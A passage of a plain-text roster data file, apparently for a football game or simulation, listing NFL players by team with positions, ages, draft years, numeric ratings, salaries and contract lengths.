Berger,35,2005,76,84,86,89,78,77,1.3,1 CB,Tramaine Brock,29,2010,73,78,87,86,88,68,0.6,1 DL,Linval Joseph,29,2010,75,87,84,97,97,82,7.1,6 DL,Tom Johnson,33,2011,61,78,80,80,81,75,1.4,1 LB,Emmanuel Lamur,28,2012,65,67,83,75,75,78,1.6,1 K,Ryan Quigley,27,2013,73,59,85,93,81,59,0.5,2 K,Kai Forbath,30,2011,64,64,83,85,87,64,0.3,1 QB,Sam Bradford,30,2010,86,86,85,90,84,50,10.8,1 CB,Xavier Rhodes,27,2013,80,88,88,92,91,67,9.2,6 DL,Everson Griffen,30,2010,78,86,81,85,88,89,7.8,6 DL,Brian Robison,34,2007,50,83,90,79,80,82,2.2,2 CB,Marcus Sherels,30,2010,64,67,81,86,90,47,1.3,1 RB,Latavius Murray,27,2013,80,84,82,85,92,88,3.4,3 WR,Michael Floyd,28,2012,63,67,86,84,89,81,0.8,1 OL,Riley Reiff,29,2012,83,79,94,85,80,78,8.4,5 S,Harrison Smith,28,2012,77,92,89,88,87,79,6.6,4 WR,Jarius Wright,28,2012,70,75,92,80,91,78,2.7,3 QB,Case Keenum,29,2012,85,81,86,87,79,50,1.3,1 OL,Mike Remmers,28,2012,70,79,84,85,74,78,4,5 OL,Kevin McDermott,27,2013,72,60,85,64,54,65,0.6,4 LB,Anthony Barr,25,2014,75,83,84,85,84,86,4.1,2 DL,Shamar Stephen,26,2014,77,73,87,85,85,78,0.5,1 QB,Teddy Bridgewater,25,2014,69,77,87,90,85,71,1.5,1 RB,Jerick McKinnon,25,2014,75,77,87,86,93,88,0.5,1 WR,Adam Thielen,27,2013,81,89,86,91,89,78,3.5,4 OL,Jeremiah Sirles,26,2014,75,66,90,78,78,73,0.4,1 WR,Stefon Diggs,24,2015,89,90,80,91,91,80,0.4,2 RB,Blake Bell,26,2015,60,51,79,78,79,78,0.5,2 DL,Danielle Hunter,23,2015,80,77,84,79,81,89,0.5,2 LB,Eric Kendricks,25,2015,86,84,83,83,82,85,1.1,2 CB,Trae Waynes,25,2015,81,76,88,86,94,59,3.1,2 OL,Nick Easton,25,2015,69,69,87,82,72,75,0.3,1 RB,Mack Brown,26,2015,66,58,88,80,87,81,0.3,1 S,Anthony Harris,26,2015,80,70,83,83,87,57,0.3,1 WR,Laquon Treadwell,22,2016,84,73,88,84,87,78,2.3,3 WR,David Morgan,24,2016,71,66,80,79,72,71,0.4,3 LB,Kentrell Brothers,24,2016,76,58,90,88,85,73,0.4,3 CB,Mackensie Alexander,24,2016,83,70,85,85,90,53,0.8,3 S,Jayron Kearse,23,2016,65,57,89,77,85,69,0.4,3 DL,Stephen Weatherly,23,2016,70,50,86,78,80,85,0.3,2 OL,Rashod Hill,25,2016,65,53,86,78,74,75,0.3,2 RB,CJ Ham,24,2016,70,66,85,77,83,82,0.3,2 RB,Dalvin Cook,22,2017,80,77,86,87,90,89,1.4,4 WR,Stacy Coley,23,2017,64,56,81,83,91,75,0.4,4 OL,Danny Isidora,23,2017,68,60,84,85,78,74,0.4,4 OL,Pat Elflein,23,2017,73,74,91,88,74,72,0.7,4 QB,Kyle Sloter,23,2017,74,61,90,89,76,71,0.3,1 DL,Jaleel Johnson,23,2017,75,62,89,82,84,83,0.6,4 DL,Tashawn Bower,22,2017,67,49,84,77,79,82,0.3,3 LB,Ben Gedeon,23,2017,79,67,93,78,81,78,0.5,4 LB,Eric Wilson,23,2017,69,50,87,81,81,79,0.3,3 OL,Aviante Collins,24,2017,72,49,84,86,74,72,0.3,3 END_PLAYERS ###################################################################### COWBOYS Dallas Cowboys,DAL K,Mike Nugent,35,2005,37,52,84,91,77,52,0.6,1 OL,Tyron Smith,27,2011,80,97,87,89,78,85,9.3,7 DL,Stephen Paea,29,2011,65,76,85,96,93,75,1.5,1 WR,Dez Bryant,29,2010,76,90,89,92,89,89,10.8,3 LB,Sean Lee,31,2010,79,97,85,95,88,84,5.6,3 WR,Jason Witten,35,2003,56,97,94,93,77,72,4.6,5 CB,Orlando Scandrick,30,2008,68,81,83,89,90,72,2.6,3 OL,L. P. Ladouceur,36,2005,76,85,85,72,55,72,0.7,1 LB,Justin Durant,32,2007,65,76,88,83,76,82,0.6,1 K,Dan Bailey,29,2011,71,71,84,92,95,71,2.4,4 RB,Darren McFadden,30,2008,66,72,77,80,89,78,0.6,1 OL,Jonathan Cooper,27,2013,69,69,79,88,77,73,1.5,1 OL,Travis Frederick,26,2013,91,95,96,92,88,81,6,7 K,Chris Jones,28,2011,70,69,81,93,92,69,1,1 WR,Terrance Williams,28,2013,74,80,88,84,90,79,3.3,4 OL,Byron Bell,28,2011,77,74,84,91,74,75,1.3,1 DL,Tyrone Crawford,28,2012,70,81,82,81,85,84,6.6,4 LB,Kyle Wilber,28,2012,62,72,83,80,80,79,1.1,1 OL,Joe Looney,27,2012,67,66,86,82,78,72,0.5,1 RB,Alfred Morris,29,2012,68,80,93,87,87,82,1.3,1 WR,James Hanna,28,2012,72,78,79,75,87,74,2.1,2 WR,Cole Beasley,28,2012,72,86,91,87,88,80,2.6,2 WR,Brice Butler,27,2013,75,79,82,81,92,74,0.8,1 DL,Benson Mayowa,26,2013,76,73,81,70,76,86,2.3,2 S,Jeff Heath,26,2013,71,72,87,83,89,67,1.4,3 OL,Zack Martin,27,2014,83,96,94,93,91,93,2.1,1 CB,Bene Benwikere,26,2014,77,64,87,85,88,64,0.4,1 LB,Anthony Hitchens,25,2014,78,80,92,81,82,83,0.6,1 DL,DeMarcus Lawrence,25,2014,84,84,86,79,82,88,1.2,1 RB,Keith Smith,25,2014,80,76,83,66,77,71,0.4,1 WR,Geoff Swaim,24,2015,78,67,79,74,82,70,0.4,2 OL,Chaz Green,25,2015,82,73,81,76,73,76,0.5,2 OL,La'el Collins,24,2015,84,74,88,88,77,75,3.9,3 LB,Damien Wilson,24,2015,77,73,86,82,81,80,0.5,2 S,Byron Jones,25,2015,82,77,89,91,91,66,2,2 DL,David Irving,24,2015,74,78,84,73,77,87,0.4,1 DL,Richard Ash,25,2015,59,46,85,88,86,75,0.3,2 RB,Rod Smith,25,2015,69,66,87,79,86,80,0.4,2 QB,Dak Prescott,24,2016,88,86,93,93,81,80,0.5,3 RB,Ezekiel Elliott,22,2016,84,88,92,87,91,90,6.2,3 DL,Charles Tapper,24,2016,73,57,90,80,85,86,0.5,3 DL,Maliek Collins,22,2016,82,76,87,84,86,86,0.7,3 LB,Jaylon Smith,22,2016,83,69,82,84,82,81,1.4,3 CB,Anthony Brown,24,2016,85,77,90,87,95,63,0.4,3 S,Kavon Frazier,23,2016,75,63,91,82,86,78,0.4,3 LB,Justin March-Lillard,24,2015,81,69,82,82,81,79,0.3,1 WR,Noah Brown,20,2017,70,52,84,85,87,72,0.4,4 WR,Blake Jarwin,23,2017,63,47,85,78,81,69,0.3,3 DL,Taco Charlton,23,2017,79,64,90,79,84,91,2.3,4 CB,Jourdan Lewis,22,2017,85,74,91,85,89,76,0.6,4 CB,Chidobe Awuzie,22,2017,77,68,88,83,91,78,0.8,4 S,Xavier Woods,22,2017,76,68,89,82,89,73,0.4,4 WR,Ryan Switzer,23,2017,68,61,90,83,89,79,0.5,4 QB,Cooper Rush,24,2017,77,62,91,88,75,51,0.3,3 DL,Lewis Neal,22,2017,73,50,87,80,81,79,0.3,1 END_PLAYERS ###################################################################### GIANTS New York Giants,NYG RB,Shane Vereen,28,2011,74,80,87,79,88,81,3.2,1 CB,Dominique R-Cromartie,31,2008,80,91,82,93,93,54,5.4,2 WR,Dwayne Harris,30,2011,67,71,90,80,87,84,2.6,3 LB,JT Thomas,29,2011,61,69,85,79,75,78,2.3,1 OL,John Jerry,31,2010,81,83,74,88,75,73,2.5,3 WR,Brandon Marshall,33,2006,74,84,93,85,86,83,3.9,2 DL,Jason Pierre-Paul,28,2010,74,87,87,85,92,92,12.3,4 QB,Eli Manning,36,2004,48,86,97,90,83,43,17.5,3 OL,Zak DeOssie,33,2007,63,78,89,71,57,68,0.7,2 DL,Damon Harrison,29,2012,75,95,85,93,97,83,6.5,4 DL,Corbin Bryant,29,2011,59,67,83,86,84,78,0.5,1 OL,DJ Fluker,26,2013,74,75,87,91,73,72,2.7,1 OL,Justin Pugh,27,2013,79,86,87,88,82,73,2.7,1 LB,Mark Herzlich,30,2011,63,75,87,78,80,75,0.6,1 QB,Geno Smith,27,2013,72,66,87,91,78,67,0.7,1 LB,Jonathan Casillas,30,2009,72,79,76,82,75,83,2,1 DL,Devin Taylor,28,2013,68,69,85,73,75,82,0.5,1 WR,Tavarres King,27,2013,71,64,85,77,89,81,0.4,1 CB,Janoris Jenkins,29,2012,80,89,91,91,91,77,7.7,4 DL,Olivier Vernon,27,2012,85,87,91,83,87,87,10.3,4 LB,Keenan Robinson,28,2012,71,76,84,82,83,84,1.8,1 RB,Rhett Ellison,29,2012,72,77,79,69,81,67,3.4,4 LB,Deontae Skinner,27,2014,69,62,86,77,73,74,0.4,1 CB,Ross Cockrell,26,2014,71,76,89,87,90,66,1.1,1 OL,Weston Richburg,26,2014,81,89,90,89,77,74,1,1 WR,Odell Beckham Jr.,25,2014,81,94,90,89,94,85,3.1,2 DL,Jay Bromley,25,2014,72,69,85,85,83,80,0.5,1 LB,Devon Kennard,26,2014,72,78,83,86,84,79,0.5,1 S,Nat Berhe,26,2014,69,60,87,80,87,67,0.4,1 K,Brad Wing,26,2014,73,62,83,91,82,62,1.4,3 RB,Orleans Darkwa,25,2014,75,79,87,85,90,85,0.7,1 DL,Kerry Wynn,26,2014,75,65,85,86,85,79,1.1,1 OL,Bobby Hart,23,2015,80,78,85,84,74,72,0.4,2 OL,Ereck Flowers,23,2015,76,74,86,90,72,73,3.5,2 S,Landon Collins,23,2015,87,92,88,87,88,85,1.3,2 LB,Curtis Grant,25,2015,61,56,81,77,80,75,0.3,2 WR,Matt LaCosse,25,2015,63,54,85,75,82,69,0.3,1 OL,Brett Jones,26,2015,71,65,83,84,73,77,0.3,1 DL,Robert Thomas,26,2014,65,58,78,94,88,71,0.3,1 RB,Paul Perkins,23,2016,84,78,84,82,89,83,0.4,3 WR,Sterling Shepard,24,2016,93,86,89,88,90,80,1.3,3 WR,Roger Lewis,24,2016,73,68,85,78,91,77,0.3,2 WR,Jerell Adams,25,2016,66,59,83,77,84,70,0.4,3 CB,Eli Apple,22,2016,83,71,89,85,92,59,3.6,3 S,Darian Thompson,24,2016,80,71,87,82,86,77,0.6,3 LB,BJ Goodson,24,2016,73,67,87,85,88,79,0.5,3 S,Andrew Adams,24,2016,81,66,87,81,88,68,0.3,2 QB,Davis Webb,22,2017,78,65,85,93,76,65,0.6,4 RB,Wayne Gallman,23,2017,83,71,88,86,89,83,0.5,4 WR,Evan Engram,23,2017,76,71,85,83,90,85,2.5,4 OL,Chad Wheeler,23,2017,81,63,83,80,72,73,0.3,3 DL,Dalvin Tomlinson,23,2017,79,79,85,86,89,80,0.9,4 DL,Avery Moss,23,2017,67,53,84,77,81,88,0.4,4 K,Aldrick Rosas,23,2016,73,53,76,89,80,53,0.3,2 LB,Calvin Munson,23,2017,68,62,87,82,83,74,0.3,3 END_PLAYERS ###################################################################### EAGLES Philadelphia Eagles,PHI S,Corey Graham,32,2007,67,77,89,83,87,79,1.2,1 RB,LeGarrette Blount,31,2010,83,96,88,89,87,86,0.9,1 WR,Torrey Smith,28,2011,69,78,91,83,90,79,3,3 OL,Stefen Wisniewski,28,2011,76,76,92,85,78,78,1.9,3 OL,Jason Kelce,30,2011,76,86,82,85,98,76,4.5,4 DL,Brandon Graham,29,2010,79,89,87,86,90,91,4.5,2 OL,Jason Peters,35,2004,70,95,89,95,85,88,7.7,3 WR,Brent Celek,32,2007,70,86,87,85,75,71,3.2,2 OL,Lane Johnson,27,2013,85,90,90,88,87,86,7.9,4 OL,Chance Warmack,26,2013,75,72,91,92,74,76,0.6,2 K,Donnie Jones,37,2004,56,64,81,85,81,64,0.9,2 DL,Chris Long,32,2008,68,77,89,86,83,83,1.3,2 WR,Zach Ertz,27,2013,87,95,87,93,80,77,6,5 CB,Patrick Robinson,30,2010,73,82,84,86,88,68,0.5,1 S,Malcolm Jenkins,30,2009,76,82,95,87,86,78,6.1,3 DL,Steven Means,27,2013,67,60,80,69,75,84,0.5,2 RB,Kenjon Barner,27,2013,70,54,89,75,92,83,0.4,1 DL,Fletcher Cox,27,2012,76,85,88,89,94,90,13.5,6 WR,Alshon Jeffery,27,2012,85,86,90,89,89,79,10.3,1 LB,Mychal Kendricks,27,2012,83,78,85,84,83,85,5.3,3 DL,Vinny Curry,29,2012,70,75,86,81,82,85,6.9,4 OL,Brandon Brooks,28,2012,75,86,83,95,82,86,6.1,4 QB,Nick Foles,28,2012,67,71,84,90,77,45,3.1,2 LB,Nigel Bradham,28,2012,70,87,93,84,81,87,2.7,1 LB,Najee Goode,28,2012,60,65,85,74,75,77,0.6,1 S,Rodney McLeod,27,2012,76,81,88,86,85,73,5.1,4 S,Jaylen Watkins,26,2014,71,70,89,82,91,64,0.4,1 CB,Dexter McDougle,26,2014,62,57,79,81,91,61,0.4,2 DL,Timmy Jernigan,25,2014,78,86,84,86,88,84,5.9,5 OL,Taylor Hart,26,2014,72,62,88,76,78,74,0.4,1 DL,Beau Allen,26,2014,73,76,87,88,88,74,0.3,1 RB,Trey Burton,26,2014,75,76,92,74,86,82,1.6,1 RB,Jay Ajayi,24,2015,86,87,81,88,88,90,0.4,2 WR,Nelson Agholor,24,2015,86,78,86,82,91,82,2.2,2 LB,Jordan Hicks,25,2015,81,86,81,85,85,86,0.5,2 CB,Ronald Darby,23,2015,83,81,81,90,93,72,0.9,2 OL,Rick Lovato,25,2015,67,59,87,72,51,69,0.3,1 QB,Carson Wentz,25,2016,74,85,92,92,83,79,6.6,3 RB,Wendell Smallwood,23,2016,74,72,89,82,91,84,0.4,3 OL,Isaac Seumalo,24,2016,84,73,85,84,73,75,0.6,3 CB,Jalen Mills,23,2016,82,71,85,85,90,72,0.4,3 OL,Halapouliva Vaitai,24,2016,77,67,89,82,74,73,0.4,3 LB,Kamu Grugier-Hill,23,2016,61,49,91,78,78,79,0.4,3 LB,Joe Walker,25,2016,63,55,89,84,83,78,0.4,3 DL,Destiny Vaeao,23,2016,77,63,82,84,85,78,0.3,2 WR,Marcus Johnson,23,2016,69,63,84,77,93,72,0.3,2 RB,Corey Clement,23,2017,76,59,85,85,87,84,0.3,3 DL,Derek Barnett,21,2017,75,68,85,87,86,83,3,4 DL,Elijah Qualls,22,2017,67,55,89,93,90,80,0.4,4 CB,Sidney Jones,21,2017,71,66,82,82,90,78,1.3,4 CB,Rasul Douglas,24,2017,76,68,88,80,87,75,0.6,4 LB,Nathan Gerry,22,2017,74,59,85,74,75,77,0.4,4 K,Jake Elliott,22,2017,67,58,78,97,86,58,0.4,4 WR,Shelton Gibson,22,2017,66,56,85,81,93,78,0.4,4 WR,Mack Hollins,24,2017,70,69,86,83,90,78,0.5,4 END_PLAYERS ###################################################################### REDSKINS Washington Redskins,WAS QB,Colt McCoy,31,2010,75,71,92,81,76,64,2.2,2 OL,Shawn Lauvao,30,2010,76,80,87,86,75,73,3.1,1 LB,Ryan Kerrigan,29,2011,79,89,92,83,88,79,8.8,4 DL,Phil Taylor,29,2011,68,68,77,88,88,80,0.5,1 RB,Niles Paul,28,2011,60,69,84,69,88,75,1.4,1 DL,Terrell McClain,29,2011,72,77,77,89,88,78,3.9,4 LB,Chris Carter,28,2011,68,69,85,76,73,74,0.6,1 LB,Mason Foster,28,2011,70,85,88,85,82,78,0.9,1 WR,Vernon Davis,33,2006,65,84,87,83,87,78,3.8,3 OL,Ty Nsekhe,32,2012,70,77,80,84,82,77,0.4,1 DL,Arthur Jones,31,2010,68,78,86,90,89,80,0.5,1 OL,Nick Sundberg,30,2009,65,65,79,69,67,64,0.7,4 OL,Trent Williams,29,2010,91,95,89,95,89,88,9.2,4 S,DeAngelo Hall,34,2004,66,83,84,87,88,68,3.5,1 S,DJ Swearinger,26,2013,81,83,91,85,83,65,3.5,3 WR,Terrelle Pryor Sr.,28,2011,72,83,88,85,91,80,5.4,1 LB,Junior Galette,29,2010,71,81,80,78,80,78,0.5,1 WR,Jordan Reed,27,2013,91,94,83,94,86,84,8,4 DL,Ziggy Hood,30,2009,62,73,82,88,84,80,0.9,2 RB,Chris Thompson,27,2013,78,86,71,81,91,81,1.6,1 WR,Brian Quick,28,2012,62,73,86,85,87,81,0.6,1 LB,Zach Brown,28,2012,71,88,83,87,80,88,1.7,1 QB,Kirk Cousins,29,2012,79,84,90,92,85,56,14.3,1 CB,Josh Norman,30,2012,77,95,94,90,88,77,10.8,4 DL,Stacy McGee,27,2013,75,76,80,86,85,76,3.5,5 LB,Trent Murphy,27,2014,75,80,88,79,84,80,0.9,1 CB,Bashaud Breeland,25,2014,75,78,85,86,87,72,0.6,1 OL,Spencer Long,27,2014,74,85,79,88,74,78,0.7,1 WR,Ryan Grant,27,2014,82,77,84,82,88,74,0.4,1 OL,Morgan Moses,26,2014,79,86,84,89,87,74,5.2,6 LB,Will Compton,28,2013,62,74,88,82,81,81,1.1,1 K,Tress Way,27,2014,62,60,83,98,84,60,1.1,4 WR,Jamison Crowder,24,2015,80,84,89,87,91,80,0.5,2 OL,Brandon Scherff,26,2015,79,92,88,92,88,73,5.2,2 OL,TJ Clemmings,26,2015,74,72,88,85,73,71,0.5,2 LB,Preston Smith,25,2015,77,73,85,80,84,79,1.2,2 LB,Martrell Spaight,24,2015,79,73,84,85,84,80,0.4,2 S,Deshazor Everett,25,2015,72,68,85,83,87,62,0.3,1 CB,Quinton Dunbar,25,2015,70,68,86,83,91,58,0.3,1 WR,Josh Doctson,25,2016,79,72,86,85,89,81,2.3,3 DL,Matt Ioannidis,23,2016,82,73,89,89,89,82,0.3,2 CB,Kendall Fuller,22,2016,88,76,84,85,90,77,0.6,3 RB,Rob Kelley,25,2016,79,82,88,88,86,86,0.3,2 DL,Anthony Lanier,24,2016,64,53,86,72,75,82,0.3,2 RB,Samaje Perine,22,2017,85,72,85,85,87,82,0.6,4 WR,Jeremy Sprinkle,23,2017,73,57,86,76,84,75,0.4,4 OL,Chase Roullier,24,2017,67,57,89,85,77,73,0.4,4 DL,Jonathan Allen,22,2017,84,76,84,85,86,84,2.7,4 LB,Ryan Anderson,23,2017,73,65,88,83,86,74,1.1,4 CB,Fabian Moreau,23,2017,68,64,85,85,94,74,0.6,4 LB,Josh Harvey-Clemon,23,2017,73,62,85,79,77,77,0.4,4 K,Nick Rose,23,2016,69,50,68,50,88,50,0.3,1 CB,Joshua Holsey,24,2017,75,53,83,79,90,68,0.4,4 S,Montae Nicholson,22,2017,84,69,83,83,92,68,0.5,4 OL,Tyler Catalina,24,2017,75,56,87,81,77,71,0.3,3 END_PLAYERS ###################################################################### FALCONS Atlanta Falcons,ATL OL,Andy Levitre,31,2009,81,88,92,88,87,78,4.7,2 OL,Ben Garland,29,2010,62,60,89,82,80,76,0.4,1 DL,Ahtyba Rubin,31,2008,67,76,87,92,91,77,0.5,1 WR,Andre Roberts,29,2010,67,79,88,79,89,81,1.4,1 WR,Julio Jones,28,2011,83,99,92,98,94,91,10,4 DL,Adrian Clayborn,29,2011,66,79,84,84,85,85,3.3,1 DL,Brooks Reed,30,2011,73,79,88,76,83,89,3.2,3 K,Matt Bosher,30,2011,76,69,88,92,88,69,1.8,3 LB,Sean Weatherspoon,30,2010,63,68,85,77,80,81,0.5,1 K,Matt Bryant,42,2002,52,70,75,96,96,70,1.9,1 QB,Matt Ryan,32,2008,84,93,96,94,91,58,15.8,2 CB,Desmond Trufant,27,2013,78,86,87,92,92,85,9.5,6 CB,Robert Alford,29,2013,71,77,83,90,93,61,6.9,4 CB,Blidi Wreh-Wilson,28,2013,69,67,83,84,88,66,0.5,1 QB,Matt Schaub,36,2004,42,84,85,82,76,38,3.4,2 WR,Levine Toilolo,26,2013,79,79,80,78,76,66,3,3 DL,Dontari Poe,27,2012,78,80,92,95,94,87,5.1,1 DL,Courtney Upshaw,28,2012,69,71,93,81,84,84,0.8,1 WR,Mohamed Sanu,28,2012,73,87,91,93,88,82,4.7,4 DL,Derrick Shelby,28,2012,64,72,84,82,82,83,3.4,3 OL,Josh Harris,28,2012,68,62,89,64,61,66,0.6,2 OL,Austin Pasztor,27,2012,69,75,85,83,75,82,0.5,1 RB,Derrick Coleman,27,2012,76,68,86,80,88,76,0.4,1 S,Kemal Ishmael,26,2013,77,73,85,82,85,77,1.5,1 LB,LaRoy Reynolds,27,2013,73,61,84,78,83,78,0.9,1 OL,Ryan Schraeder,29,2013,89,88,88,87,88,85,4.6,5 WR,Nick Williams,27,2013,79,75,87,81,86,75,0.4,1 S,Ricardo Allen,26,2014,86,81,91,88,89,68,0.4,1 OL,Jake Matthews,25,2014,78,83,94,86,86,76,5,2 RB,Devonta Freeman,25,2014,87,88,91,90,92,93,6.1,6 WR,Taylor Gabriel,26,2014,86,84,79,86,95,78,1.6,1 RB,Tevin Coleman,24,2015,83,83,85,87,94,89,0.6,2 WR,Justin Hardy,26,2015,68,69,89,84,87,83,0.5,2 OL,Ty Sambrailo,25,2015,74,72,85,79,83,72,0.7,2 DL,Grady Jarrett,24,2015,89,84,80,89,89,83,0.4,2 LB,Vic Beasley Jr.,25,2015,75,83,84,78,84,88,3.5,2 CB,Jalen Collins,24,2015,74,76,82,87,90,70,1.1,2 RB,Terron Ward,25,2015,74,68,87,82,87,85,0.3,1 CB,CJ Goodwin,27,2014,72,60,84,83,91,48,0.3,1 WR,Austin Hooper,23,2016,84,75,89,79,82,76,0.6,3 LB,Deion Jones,23,2016,86,85,84,85,82,86,0.9,3 S,Keanu Neal,22,2016,77,76,91,85,87,79,2.5,3 LB,De'vondre Campbell,24,2016,79,83,88,83,81,85,0.5,3 OL,Wes Schweitzer,24,2016,69,65,88,81,75,72,0.4,3 WR,Devin Fuller,23,2016,66,55,86,74,93,72,0.4,3 CB,Brian Poole,25,2016,76,81,85,82,89,79,0.3,2 S,Sharrod Neasman,26,2016,59,52,86,77,83,71,0.3,1 WR,Eric Saubert,23,2017,76,55,88,75,83,77,0.4,4 OL,Sean Harlow,22,2017,71,62,86,86,80,76,0.5,4 S,Damontae Kazee,24,2017,79,66,89,82,88,68,0.4,4 DL,Takkarist McKinley,22,2017,77,70,85,81,82,89,2.4,4 LB,Duke Riley,23,2017,82,66,87,87,84,80,0.7,4 WR,Marvin Hall,24,2016,62,50,88,70,92,78,0.3,1 LB,Jermaine Grace,24,2017,74,60,84,77,81,79,0.3,3 END_PLAYERS ###################################################################### PANTHERS Carolina Panthers,CAR DL,Julius Peppers,37,2002,43,84,89,82,85,88,3.1,1 WR,Greg Olsen,32,2007,76,97,92,97,85,78,6.9,2 S,Jairus Byrd,31,2009,65,71,89,85,84,73,0.5,1 S,Mike Adams,36,2004,70,88,84,84,82,71,1.5,2 QB,Derek Anderson,34,2005,51,75,91,91,74,38,1.9,1 S,Colin Jones,30,2011,63,62,82,82,90,68,0.7,2 LB,Andrew Gachkar,29,2011,63,71,83,83,77,77,0.5,1 S,Kurt Coleman,29,2010,77,84,87,84,85,69,3.5,2 OL,JJ Jansen,31,2008,71,76,85,71,56,66,0.7,4 DL,Mario Addison,30,2011,72,86,85,76,80,84,6.1,3 CB,Captain Munnerlyn,29,2009,70,74,86,85,89,72,3.5,4 LB,Thomas Davis,34,2005,45,88,90,90,84,85,8.1,2 OL,Ryan Kalil,32,2007,82,90,90,89,81,76,6.8,1 DL,Charles Johnson,31,2007,74,86,86,82,83,84,2.4,2 RB,Jonathan Stewart,30,2008,72,88,85,89,86,90,2.4,2 DL,Kyle Love,31,2010,75,79,80,85,86,76,0.7,2 OL,Greg Van Roten,27,2012,72,63,86,84,80,76,0.4,1 LB,Ben Jacobs,29,2011,68,68,89,78,76,75,0.5,1 DL,Star Lotulelei,28,2013,73,78,88,96,95,82,2.8,1 WR,Ed Dickson,30,2010,71,82,87,78,83,73,1.6,1 DL,Kawann Short,28,2013,75,89,84,87,90,85,12,5 K,Graham Gano,30,2009,72,56,80,97,85,56,2.3,1 OL,Matt Kalil,28,2012,70,78,90,89,73,73,8.1,5 OL,Amini Silatolu,29,2012,66,69,87,87,75,75,0.6,1 RB,Fozzy Whittaker,28,2012,65,72,82,74,88,79,0.7,2 DL,Wes Horton,27,2013,71,74,80,76,77,82,0.8,2 WR,Russell Shepard,27,2013,77,75,87,81,90,81,2.4,3 OL,Trai Turner,24,2014,90,87,87,88,89,79,7.4,5 QB,Garrett Gilbert,26,2014,58,47,84,85,71,55,0.3,1 WR,Brenton Bersin,27,2012,72,72,86,82,85,76,0.4,1 OL,Andrew Norwell,26,2014,78,89,88,87,80,88,1.6,1 RB,Cameron Artis-Payne,27,2015,59,48,87,84,88,81,0.4,2 WR,Devin Funchess,23,2015,87,75,86,83,89,83,1.2,2 WR,Kaelin Clay,25,2015,67,58,81,73,91,75,0.3,1 OL,Daryl Williams,25,2015,77,75,85,87,81,79,0.5,2 LB,David Mayo,24,2015,70,65,81,85,83,76,0.4,2 LB,Shaq Thompson,23,2015,83,79,89,87,84,84,2,2 CB,Ladarius Gunter,25,2015,74,68,86,82,88,77,0.3,1 WR,Chris Manhertz,25,2014,70,63,85,74,78,73,0.3,1 K,Michael Palardy,25,2014,68,57,78,91,78,57,0.3,1 OL,Tyler Larsen,26,2014,70,69,88,93,82,74,0.3,1 OL,John Theus,23,2016,78,62,90,73,74,73,0.4,3 DL,Vernon Butler,23,2016,76,71,87,83,86,88,1.9,3 LB,Jared Norris,24,2016,70,50,88,78,80,73,0.3,2 CB,Daryl Worley,22,2016,73,75,89,83,86,70,0.6,3 CB,Kevon Seymour,24,2016,66,53,80,81,93,60,0.4,3 CB,James Bradberry,24,2016,77,79,88,86,91,72,0.8,3 RB,Christian McCaffrey,21,2017,82,68,87,81,91,84,4.2,4 WR,Curtis Samuel,21,2017,83,69,86,80,95,77,1.4,4 DL,Bryan Cox Jr.,23,2017,74,51,82,81,84,83,0.3,3 OL,Taylor Moton,23,2017,75,65,94,87,83,80,0.8,4 DL,Daeshon Hall,22,2017,65,58,88,76,79,86,0.6,4 RB,Alex Armah,23,2017,71,59,93,76,82,75,0.4,4 END_PLAYERS ###################################################################### SAINTS New Orleans Saints,NO RB,Mark Ingram,28,2011,74,88,89,87,87,87,2.9,2 DL,Cameron Jordan,28,2011,80,90,92,91,94,90,8.5,4 DL,Nick Fairley,29,2011,73,79,88,88,89,84,5.4,4 S,Rafael Bush,30,2010,64,77,83,84,87,66,0.6,1 WR,Ted Ginn Jr.,32,2007,77,83,81,78,93,81,2.8,3 S,Kenny Vaccaro,26,2013,73,81,93,86,85,76,2.6,1 WR,Michael Hoomanawanui,29,2010,65,78,82,79,77,64,1.1,2 LB,Manti Te'o,26,2013,78,80,88,86,81,80,1.7,2 OL,Larry Warford,26,2013,74,80,92,89,74,81,6.3,4 QB,Drew Brees,38,2001,61,99,96,90,92,46,7.3,1 OL,Zach Strief,34,2006,51,89,89,89,84,75,3.1,2 QB,Chase Daniel,31,2009,63,70,93,85,76,57,0.5,1 K,Thomas Morstead,31,2009,64,68,89,94,94,68,2.6,2 OL,Terron Armstead,26,2013,87,89,83,88,78,89,9.1,5 OL,Max Unger,31,2009,81,94,90,87,73,74,5.3,3 DL,Alex Okafor,26,2013,80,78,92,76,77,81,1.8,1 LB,Gerald Hodges Jr.,26,2013,81,79,88,88,82,80,0.5,1 LB,AJ Klein,26,2013,72,76,91,84,79,78,4.2,4 LB,Craig Robertson,29,2011,71,78,86,86,80,78,1.2,2 WR,Coby Fleener,29,2012,74,82,84,84,87,78,4.6,4 OL,Josh LeRibeus,28,2012,74,69,87,88,72,77,0.5,1 DL,John Hughes III,29,2012,69,70,83,85,86,78,0.5,1 OL,Senio Kelemete,27,2012,72,73,85,86,73,78,0.9,1 OL,Bryce Harris,28,2012,74,65,86,82,82,75,0.5,1 LB,Michael Mauti,27,2013,80,72,80,86,85,74,0.5,1 RB,Zach Line,27,2013,62,56,90,80,83,76,0.5,1 S,Chris Banjo,27,2013,75,62,84,83,88,63,0.9,2 WR,Josh Hill,27,2013,80,74,82,81,83,74,1.9,2 WR,Brandon Coleman,25,2014,78,77,83,84,87,78,0.3,1 OL,Andrus Peat,24,2015,78,78,81,86,80,72,2.7,2 DL,Tyeler Davison,25,2015,75,76,81,91,86,77,0.4,2 LB,Hau'oli Kikaha,25,2015,79,73,79,75,78,79,1.1,2 CB,PJ Williams,24,2015,81,65,88,83,90,81,0.6,2 CB,Delvin Breaux,28,2015,69,77,82,86,90,75,0.3,1 WR,Willie Snead,25,2014,85,85,86,86,89,74,0.4,1 RB,Daniel Lasco,25,2016,64,54,82,75,90,77,0.4,3 WR,Michael Thomas,23,2016,90,89,88,92,89,80,1.1,3 DL,Sheldon Rankins,23,2016,80,74,89,86,87,86,3,3 S,Vonn Bell,23,2016,86,73,87,82,88,76,0.8,3 DL,David Onyemata,25,2016,77,73,86,89,87,83,0.5,3 CB,De'vante Harris,24,2016,70,58,85,82,88,62,0.3,2 CB,Ken Crawley,24,2016,83,74,88,85,91,67,0.3,2 WR,Tommylee Lewis,25,2016,71,56,84,78,91,76,0.3,2 K,Wil Lutz,23,2016,68,60,78,96,88,60,0.3,2 RB,Alvin Kamara,21,2017,78,72,84,85,88,89,0.7,4 OL,Ryan Ramczyk,23,2017,84,75,91,88,78,78,2,4 DL,Al-Quadin Muhammad,22,2017,76,56,86,78,79,85,0.4,4 DL,Trey Hendrickson,23,2017,77,58,88,79,82,88,0.6,4 LB,Alex Anzalone,23,2017,70,67,79,82,81,78,0.6,4 S,Marcus Williams,21,2017,79,72,89,86,87,76,1.3,4 OL,Zach Wood,24,2016,70,51,83,75,53,61,0.3,2 WR,Austin 